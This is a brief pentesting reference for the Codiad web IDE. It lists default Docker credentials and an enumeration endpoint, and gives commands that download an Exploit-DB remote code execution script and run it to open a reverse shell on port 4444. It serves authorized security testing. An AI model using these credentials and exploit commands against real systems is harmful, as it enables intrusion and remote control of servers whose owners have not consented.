# Codiad Pentesting

Codiad is a web-based IDE framework.

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```
# Docker image - https://hub.docker.com/r/bitnami/codiad
user:bitnami
```

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
# Get current directory in the system
/components/project/controller.php?action=get_current
```

### Remote Code Execution (RCE) v2.8.4 <a href="#remote-code-execution-rce-v284" id="remote-code-execution-rce-v284"></a>

```
wget https://www.exploit-db.com/exploits/49705 -O exploit.py

# Linux
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 linux
# Windows
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 windows
```

### References <a href="#references" id="references"></a>

* [Exploit DB](https://www.exploit-db.com/exploits/49705)